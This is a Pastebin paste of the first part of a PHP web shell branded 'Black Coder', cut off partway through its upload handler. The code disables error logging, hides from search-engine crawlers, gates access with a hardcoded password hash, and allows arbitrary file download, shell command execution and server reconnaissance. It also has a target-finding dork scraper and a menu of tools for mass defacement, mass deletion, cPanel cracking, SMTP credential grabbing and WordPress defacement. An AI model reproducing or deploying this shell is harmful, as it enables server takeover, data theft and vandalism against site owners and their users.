SHARE
TWEET

Untitled

a guest Jun 18th, 2019 96 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "908261938eee51d82f324e3a33ebd622"; // default: aungkyawzaw
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21.         header('HTTP/1.0 404 Not Found');
  22.         exit;
  23.     }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <title>blackcoder</title>
  31. <style type="text/css">
  32. html {
  33.     margin: 20px auto;
  34.     background: #000000;
  35.     color: green;
  36.     text-align: center;
  37. }
  38. header {
  39.     color: green;
  40.     margin: 10px auto;
  41. }
  42. input[type=password] {
  43.     width: 250px;
  44.     height: 25px;
  45.     color: blue;
  46.     background: #000000;
  47.     border: 1px dotted green;
  48.     padding: 5px;
  49.     margin-left: 20px;
  50.     text-align: center;
  51. }
  52. h1{
  53.     color:blue;
  54.     }
  55. </style>
  56. </head>
  57. <center>
  58. <header>
  59. <img src="https://i.ibb.co/4SZ4Hst/Edited.png"><br>
  60. <h1>B!4CK_C0D3R</h1>
  61. </header>
  62. <form method="post">
  63. <input type="password" name="pass">
  64. </form></center>
  65. <?php
  66. exit;
  67. }
  68. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  69.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  70.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  71.     else
  72.         login_shell();
  73. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  74.     @ob_clean();
  75.     $file = $_GET['file'];
  76.     header('Content-Description: File Transfer');
  77.     header('Content-Type: application/octet-stream');
  78.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  79.     header('Expires: 0');
  80.     header('Cache-Control: must-revalidate');
  81.     header('Pragma: public');
  82.     header('Content-Length: ' . filesize($file));
  83.     readfile($file);
  84.     exit;
  85. }
  86. ?>
  87. <html>
  88. <head>
  89. <title>Black Coder</title>
  90. <meta name='author' content='black coder'>
  91. <meta charset="UTF-8">
  92. <style type='text/css'>
  93. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  94. html {
  95.    background:#000000;
  96.     color: #ffffff;
  97.     font-family: 'Ubuntu';
  98.     font-size: 13px;
  99.     width: 100%;
  100. }
  101. li {
  102.     display: inline;
  103.     margin: 5px;
  104.     padding: 5px;
  105. }
  106. table, th, td {
  107.     border-collapse:collapse;
  108.     font-family: Tahoma, Geneva, sans-serif;
  109.     background: transparent;
  110.     font-family: 'Ubuntu';
  111.     font-size: 13px;
  112. }
  113. .table_home, .th_home, .td_home {
  114.     border: 1px solid #ffffff;
  115. }
  116. th {
  117.     padding: 10px;
  118. }
  119. a {
  120.     color: #ffffff;
  121.     text-decoration: none;
  122. }
  123. a:hover {
  124.     color: gold;
  125.     text-decoration: underline;
  126. }
  127. b {
  128.     color: gold;
  129. }
  130. input[type=text], input[type=password],input[type=submit] {
  131.     background: transparent;
  132.     color: #ffffff;
  133.     border: 1px solid #ffffff;
  134.     margin: 5px auto;
  135.     padding-left: 5px;
  136.     font-family: 'Ubuntu';
  137.     font-size: 13px;
  138. }
  139. textarea {
  140.     border: 1px solid #ffffff;
  141.     width: 100%;
  142.     height: 400px;
  143.     padding-left: 5px;
  144.     margin: 10px auto;
  145.     resize: none;
  146.     background: transparent;
  147.     color: #ffffff;
  148.     font-family: 'Ubuntu';
  149.     font-size: 13px;
  150. }
  151. select {
  152.     width: 152px;
  153.     background: #000000;
  154.     color: lime;
  155.     border: 1px solid #ffffff;
  156.     margin: 5px auto;
  157.     padding-left: 5px;
  158.     font-family: 'Ubuntu';
  159.     font-size: 13px;
  160. }
  161. option:hover {
  162.     background: lime;
  163.     color: #000000;
  164. }
  165. </style>
  166. </head>
  167. <?php
  168.  
  169. function w($dir,$perm) {
  170.     if(!is_writable($dir)) {
  171.         return "<font color=red>".$perm."</font>";
  172.     } else {
  173.         return "<font color=lime>".$perm."</font>";
  174.     }
  175. }
  176. function r($dir,$perm) {
  177.     if(!is_readable($dir)) {
  178.         return "<font color=red>".$perm."</font>";
  179.     } else {
  180.         return "<font color=lime>".$perm."</font>";
  181.     }
  182. }
  183. function exe($cmd) {
  184.     if(function_exists('system')) {        
  185.         @ob_start();       
  186.         @system($cmd);     
  187.         $buff = @ob_get_contents();        
  188.         @ob_end_clean();       
  189.         return $buff;  
  190.     } elseif(function_exists('exec')) {        
  191.         @exec($cmd,$results);      
  192.         $buff = "";        
  193.         foreach($results as $result) {         
  194.             $buff .= $result;      
  195.         } return $buff;    
  196.     } elseif(function_exists('passthru')) {        
  197.         @ob_start();       
  198.         @passthru($cmd);       
  199.         $buff = @ob_get_contents();        
  200.         @ob_end_clean();       
  201.         return $buff;  
  202.     } elseif(function_exists('shell_exec')) {      
  203.         $buff = @shell_exec($cmd);     
  204.         return $buff;  
  205.     }
  206. }
  207. function perms($file){
  208.     $perms = fileperms($file);
  209.     if (($perms & 0xC000) == 0xC000) {
  210.     // Socket
  211.     $info = 's';
  212.     } elseif (($perms & 0xA000) == 0xA000) {
  213.     // Symbolic Link
  214.     $info = 'l';
  215.     } elseif (($perms & 0x8000) == 0x8000) {
  216.     // Regular
  217.     $info = '-';
  218.     } elseif (($perms & 0x6000) == 0x6000) {
  219.     // Block special
  220.     $info = 'b';
  221.     } elseif (($perms & 0x4000) == 0x4000) {
  222.     // Directory
  223.     $info = 'd';
  224.     } elseif (($perms & 0x2000) == 0x2000) {
  225.     // Character special
  226.     $info = 'c';
  227.     } elseif (($perms & 0x1000) == 0x1000) {
  228.     // FIFO pipe
  229.     $info = 'p';
  230.     } else {
  231.     // Unknown
  232.     $info = 'u';
  233.     }
  234.         // Owner
  235.     $info .= (($perms & 0x0100) ? 'r' : '-');
  236.     $info .= (($perms & 0x0080) ? 'w' : '-');
  237.     $info .= (($perms & 0x0040) ?
  238.     (($perms & 0x0800) ? 's' : 'x' ) :
  239.     (($perms & 0x0800) ? 'S' : '-'));
  240.     // Group
  241.     $info .= (($perms & 0x0020) ? 'r' : '-');
  242.     $info .= (($perms & 0x0010) ? 'w' : '-');
  243.     $info .= (($perms & 0x0008) ?
  244.     (($perms & 0x0400) ? 's' : 'x' ) :
  245.     (($perms & 0x0400) ? 'S' : '-'));
  246.     // World
  247.     $info .= (($perms & 0x0004) ? 'r' : '-');
  248.     $info .= (($perms & 0x0002) ? 'w' : '-');
  249.     $info .= (($perms & 0x0001) ?
  250.     (($perms & 0x0200) ? 't' : 'x' ) :
  251.     (($perms & 0x0200) ? 'T' : '-'));
  252.     return $info;
  253. }
  254. function hdd($s) {
  255.     if($s >= 1073741824)
  256.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  257.     elseif($s >= 1048576)
  258.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  259.     elseif($s >= 1024)
  260.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  261.     else
  262.     return $s .' B';
  263. }
  264. function ambilKata($param, $kata1, $kata2){
  265.     if(strpos($param, $kata1) === FALSE) return FALSE;
  266.     if(strpos($param, $kata2) === FALSE) return FALSE;
  267.     $start = strpos($param, $kata1) + strlen($kata1);
  268.     $end = strpos($param, $kata2, $start);
  269.     $return = substr($param, $start, $end - $start);
  270.     return $return;
  271. }
  272. function getsource($url) {
  273.     $curl = curl_init($url);
  274.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  275.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  276.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  277.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  278.     $content = curl_exec($curl);
  279.             curl_close($curl);
  280.     return $content;
  281. }
  282. function bing($dork) {
  283.     $npage = 1;
  284.     $npages = 30000;
  285.     $allLinks = array();
  286.     $lll = array();
  287.     while($npage <= $npages) {
  288.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  289.         if($x) {
  290.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  291.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  292.             $npage = $npage + 10;
  293.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  294.         } else break;
  295.     }
  296.     $URLs = array();
  297.     foreach($allLinks as $url){
  298.         $exp = explode("/", $url);
  299.         $URLs[] = $exp[2];
  300.     }
  301.     $array = array_filter($URLs);
  302.     $array = array_unique($array);
  303.     $sss = count(array_unique($array));
  304.     foreach($array as $domain) {
  305.         echo $domain."\n";
  306.     }
  307. }
  308. function reverse($url) {
  309.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  310.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  311.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  312.           curl_setopt($ch, CURLOPT_HEADER, 0);
  313.           curl_setopt($ch, CURLOPT_POST, 1);
  314.     $resp = curl_exec($ch);
  315.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  316.     $array = explode(",,", $resp);
  317.     unset($array[0]);
  318.     foreach($array as $lnk) {
  319.         $lnk = "http://$lnk";
  320.         $lnk = str_replace(",", "", $lnk);
  321.         echo $lnk."\n";
  322.         ob_flush();
  323.         flush();
  324.     }
  325.         curl_close($ch);
  326. }
  327. if(get_magic_quotes_gpc()) {
  328.     function idx_ss($array) {
  329.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  330.     }
  331.     $_POST = idx_ss($_POST);
  332.     $_COOKIE = idx_ss($_COOKIE);
  333. }
  334.  
  335. if(isset($_GET['dir'])) {
  336.     $dir = $_GET['dir'];
  337.     chdir($dir);
  338. } else {
  339.     $dir = getcwd();
  340. }
  341. $kernel = php_uname();
  342. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  343. $dir = str_replace("\\","/",$dir);
  344. $scdir = explode("/", $dir);
  345. $freespace = hdd(disk_free_space("/"));
  346. $total = hdd(disk_total_space("/"));
  347. $used = $total - $freespace;
  348. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  349. $ds = @ini_get("disable_functions");
  350. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  351. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  352. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  353. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  354. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  355. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  356. if(!function_exists('posix_getegid')) {
  357.     $user = @get_current_user();
  358.     $uid = @getmyuid();
  359.     $gid = @getmygid();
  360.     $group = "?";
  361. } else {
  362.     $uid = @posix_getpwuid(posix_geteuid());
  363.     $gid = @posix_getgrgid(posix_getegid());
  364.     $user = $uid['name'];
  365.     $uid = $uid['uid'];
  366.     $group = $gid['name'];
  367.     $gid = $gid['gid'];
  368. }
  369. echo "System: <font color=lime>".$kernel."</font><br>";
  370. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  371. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  372. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  373. echo "Safe Mode: $sm<br>";
  374. echo "Disable Functions: $show_ds<br>";
  375. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  376. echo "Current DIR: ";
  377. foreach($scdir as $c_dir => $cdir) {   
  378.     echo "<a href='?dir=";
  379.     for($i = 0; $i <= $c_dir; $i++) {
  380.         echo $scdir[$i];
  381.         if($i != $c_dir) {
  382.         echo "/";
  383.         }
  384.     }
  385.     echo "'>$cdir</a>/";
  386. }
  387. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  388. echo "<hr>";
  389. echo "<center>";
  390. echo "<ul>";
  391. echo "<li>[ <a href='?'>Home</a> ]</li>";
  392. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  393. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  394. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  395. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  396. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  397. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  398. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  399. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  400. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  401. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
  402. echo "<li>[ <a href='?dir=$dir&do=network'>network</a> ]</li>";
  403. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>";
  404. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  405. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  406. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  407. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  408. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  409. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  410. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
  411. echo "<li>[ <a style='color: red;' href='?logout=true'>Logout</a> ]</li>";
  412. echo "</ul>";
  413. echo "</center>";
  414. echo "<hr>";
  415. if($_GET['logout'] == true) {
  416.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  417.     echo "<script>window.location='?';</script>";
  418. } elseif($_GET['do'] == 'upload') {
  419.     echo "<center>";
  420.     if($_POST['upload']) {
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top